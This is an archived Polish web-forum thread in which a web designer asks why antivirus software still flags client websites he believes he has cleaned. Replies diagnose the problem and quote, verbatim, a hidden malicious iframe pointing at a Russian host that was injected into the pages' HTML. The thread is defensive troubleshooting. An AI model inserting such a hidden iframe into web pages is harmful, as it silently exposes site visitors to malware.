Skocz do zawartości

Uporczywy wirus :/


beybe

Rekomendowane odpowiedzi

Ale ja mam w tym laptopie 2 GB ramu i on mi całkowicie wystarcza do pracy jak i do grania GTA: SA mi śmiga aż miło, jak mam bardziej wymagającą grę idę grać na stacjonarnym. Nie wiem po co mam zmieniać, by mi antywirus działał ?

Odnośnik do komentarza
Udostępnij na innych stronach

  • Odpowiedzi 35
  • Dodano
  • Ostatniej odpowiedzi

Odnawiam temat bo sobie nie radzę :P

Tak jak pisałem wcześniej - wszystkie te złośliwe kody pousuwałem ale antywirus nadal blokuje mi wejście na tą stronę bo "twierdzi" że jest ona niebezpieczna... Nie wiem - albo nadal coś tam siedzi (co jest mało prawdopodobne ze zmienionymi hasłami nie przechowywanymi w żadnym programie) albo po prostu antywirus jest "przewrażliwiony" co do tej stronki...

Moja prośba dla Was w tym, że jeśli ktoś ma antywirusa to czy mógłby wejść na te stronki i sprawdzić czy wasze też coś wykrywają, czy może jednak wszystko jest ok :)

www.anmar-meble.com

gim-mikstat.prv.pl/

www.s-franciszkanki.yoyo.pl

fusion7.catalog.ionic.pl

Będę bardzo wdzięczny :huh: Nawet gdyby coś było to wirus nie szkodliwy :D Zwykła ramka z poje...ym kodem B)

button1.gif - Katalog Najlepszych Blogów - Prowadzisz bloga? Dodaj go do katalogu!
Odnośnik do komentarza
Udostępnij na innych stronach

Moja prośba dla Was w tym, że jeśli ktoś ma antywirusa to czy mógłby wejść na te stronki i sprawdzić czy wasze też coś wykrywają, czy może jednak wszystko jest ok :)

Nie trzeba mieć antywira aby zobaczyc że do kazdej z tych stron masz dolepiony iframe na samym początku kodu html (Ja też jestem jednym z tych ktorzy nie uzywają antywira w tle)

Nie bede juz powtarzał co masz zrobic bo było juz to pisane kilkanascie razy na tym forum.

Dodam od siebie że możesz jeszcze ustawić hmod pliku na 444, tego do ktorego zostaje dolepione to iframe.

Wiem tez że nie wszystkie te zarażenia pochodzą od zarażonego kmputera webmastera i jego TC ale też od samego serwera - czyli wina nie zawsze jest po stronie webmastera ale również po stronie hostingu.

.

Odnośnik do komentarza
Udostępnij na innych stronach

Nie trzeba mieć antywira aby zobaczyc że do kazdej z tych stron masz dolepiony iframe na samym początku kodu html (Ja też jestem jednym z tych ktorzy nie uzywają antywira w tle)

Wiem :P Ale ja mam pewność, że na tych stronach już nic nie ma a antywirus nadal się pluje :|

Walnę sobie formata i po bólu ;]

button1.gif - Katalog Najlepszych Blogów - Prowadzisz bloga? Dodaj go do katalogu!
Odnośnik do komentarza
Udostępnij na innych stronach

Nie trzeba mieć antywira aby zobaczyc że do kazdej z tych stron masz dolepiony iframe na samym początku kodu html (Ja też jestem jednym z tych ktorzy nie uzywają antywira w tle)

Wiem :P Ale ja mam pewność, że na tych stronach już nic nie ma a antywirus nadal się pluje :|

Walnę sobie formata i po bólu ;]

Jak nie masz ??? Masz na początku kodu

<iframe src="https://q1k.ru:8080/index.php" width=145 height=121 style="visibility: hidden">

Tak to jest ten problem i nie ma się co dziwić że antywirus ci się burzy. Druga sprawa to prymitywne przekierowanie na yoyo, naprawdę taki problem jest w tym by wydać rocznie 100 zł na serwer ? Przez to przekierowanie na anmar-meble.com, masz tylko główną stronę za indeksowaną.

Odnośnik do komentarza
Udostępnij na innych stronach

Tak to jest ten problem i nie ma się co dziwić że antywirus ci się burzy. Druga sprawa to prymitywne przekierowanie na yoyo, naprawdę taki problem jest w tym by wydać rocznie 100 zł na serwer ? Przez to przekierowanie na anmar-meble.com, masz tylko główną stronę za indeksowaną.

W takim razie muszę jeszcze przeglądać...

Ja strony tylko wykonywałem, a Ci którzy chcieli stronkę no to mieli problem wydać parę złotych na serwer :P

Pomimo tego, że przedstawiłem im wady darmowych hostingów - woleli za darmo :P

A co do tego anmar-meble.com to właściciel zrobił sobie złe przekierowanie :P Nie dał mi danych do nazwa.pl no i takie ma skutki :P Hehe to już jest ich sprawa - ja muszę tylko naprawić to co wynikło z mojej winy... Te nieszczęsne ramki :/

button1.gif - Katalog Najlepszych Blogów - Prowadzisz bloga? Dodaj go do katalogu!
Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności